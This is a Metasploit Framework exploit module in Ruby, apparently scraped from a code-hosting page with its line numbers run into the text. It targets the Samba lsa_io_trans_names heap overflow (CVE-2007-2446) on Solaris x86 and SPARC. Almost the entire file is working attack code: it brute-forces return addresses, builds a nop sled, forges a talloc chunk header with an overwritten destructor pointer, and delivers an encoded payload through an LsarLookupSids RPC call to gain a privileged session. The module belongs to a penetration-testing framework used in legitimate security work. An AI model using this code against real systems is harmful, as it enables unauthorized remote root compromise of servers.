Path: blob/master/modules/exploits/solaris/samba/lsa_transnames_heap.rb
19718 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::DCERPC9include Msf::Exploit::Remote::SMB::Client10include Msf::Exploit::Brute1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Samba lsa_io_trans_names Heap Overflow',17'Description' => %q{18This module triggers a heap overflow in the LSA RPC service19of the Samba daemon. This module uses the TALLOC chunk overwrite20method (credit Ramon and Adriano), which only works with Samba21versions 3.0.21-3.0.24. Additionally, this module will not work22when the Samba "log level" parameter is higher than "2".23},24'Author' => [25'Ramon de C Valle',26'Adriano Lima <adriano[at]risesecurity.org>',27'hdm'28],29'License' => MSF_LICENSE,30'References' => [31['CVE', '2007-2446'],32['OSVDB', '34699'],33],34'Privileged' => true,35'Payload' => {36'Space' => 102437},38'Platform' => 'solaris',39'Targets' => [40[41'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',42{43'Platform' => 'solaris',44'Arch' => [ ARCH_X86 ],45'Nops' => 64 * 1024,46'Bruteforce' =>47{48'Start' => { 'Ret' => 0x082f2000 },49'Stop' => { 'Ret' => 0x084f2000 },50'Step' => 60 * 102451}52}53],54[55'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',56{57'Platform' => 'solaris',58'Arch' => [ ARCH_SPARC ],59'Nops' => 64 * 1024,60'Bruteforce' =>61{62'Start' => { 'Ret' => 0x00322000 },63'Stop' => { 'Ret' => 0x00722000 },64'Step' => 60 * 102465}66}67],68[69'DEBUG',70{71'Platform' => 'solaris',72'Arch' => [ ARCH_X86 ],73'Nops' => 64 * 1024,74'Bruteforce' =>75{76'Start' => { 'Ret' => 0xaabbccdd },77'Stop' => { 'Ret' => 0xaabbccdd },78'Step' => 60 * 102479}80}81],82],83'DisclosureDate' => '2007-05-14',84'DefaultTarget' => 0,85'Notes' => {86'Stability' => [CRASH_SERVICE_RESTARTS],87'Reliability' => [REPEATABLE_SESSION],88'SideEffects' => [IOC_IN_LOGS]89}90)91)9293register_options([94OptString.new('SMBPIPE', [true, 'The pipe name to use', 'LSARPC']),95])9697deregister_options('DCERPC::fake_bind_multi')98end99100# Need to perform target detection101def autofilter102false103end104105def brute_exploit(target_addrs)106if !@nops107if (target['Nops'] > 0)108print_status('Creating nop sled....')109@nops = make_nops(target['Nops'])110else111@nops = ''112end113end114115print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])116117nops = @nops118pipe = datastore['SMBPIPE'].downcase119120print_status('Connecting to the SMB service...')121connect122smb_login123124datastore['DCERPC::fake_bind_multi'] = false125126handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])127print_status("Binding to #{handle} ...")128dcerpc_bind(handle)129print_status("Bound to #{handle} ...")130131num_entries = 272132num_entries2 = 288133134#135# First talloc_chunk136# 16 bits align137# 16 bits sid_name_use138# 16 bits uni_str_len139# 16 bits uni_max_len140# 32 bits buffer141# 32 bits domain_idx142#143buf = (('A' * 16) * num_entries)144145# Padding146buf << 'A' * 8147148# TALLOC_MAGIC149talloc_magic = "\x70\xec\x14\xe8"150151# Second talloc_chunk header152buf << 'A' * 8 # next, prev153buf << NDR.long(0) + NDR.long(0) # parent, child154buf << NDR.long(0) # refs155buf << [target_addrs['Ret']].pack('V') # destructor156buf << 'A' * 4 # name157buf << 'A' * 4 # size158buf << talloc_magic # flags159160stub = lsa_open_policy(dcerpc)161162stub << NDR.long(0) # num_entries163stub << NDR.long(0) # ptr_sid_enum164stub << NDR.long(num_entries) # num_entries165stub << NDR.long(0x20004) # ptr_trans_names166stub << NDR.long(num_entries2) # num_entries2167stub << buf168stub << nops169stub << payload.encoded170171print_status('Calling the vulnerable function...')172173begin174# LsarLookupSids175dcerpc.call(0x0f, stub)176rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError177print_status('Server did not respond, this is expected')178rescue Rex::Proto::DCERPC::Exceptions::Fault179print_error('Server is most likely patched...')180rescue StandardError => e181if e.to_s =~ /STATUS_PIPE_DISCONNECTED/182print_status('Server disconnected, this is expected')183else184print_error("Error: #{e.class}: #{e}")185end186end187188handler189disconnect190end191192def lsa_open_policy(dcerpc, server = '\\')193stubdata =194# Server195NDR.uwstring(server) +196# Object Attributes197NDR.long(24) + # SIZE198NDR.long(0) + # LSPTR199NDR.long(0) + # NAME200NDR.long(0) + # ATTRS201NDR.long(0) + # SEC DES202# LSA QOS PTR203NDR.long(1) + # Referent204NDR.long(12) + # Length205NDR.long(2) + # Impersonation206NDR.long(1) + # Context Tracking207NDR.long(0) + # Effective Only208# Access Mask209NDR.long(0x02000000)210211dcerpc.call(6, stubdata)212213dcerpc.last_response.stub_data[0, 20]214end215end216217218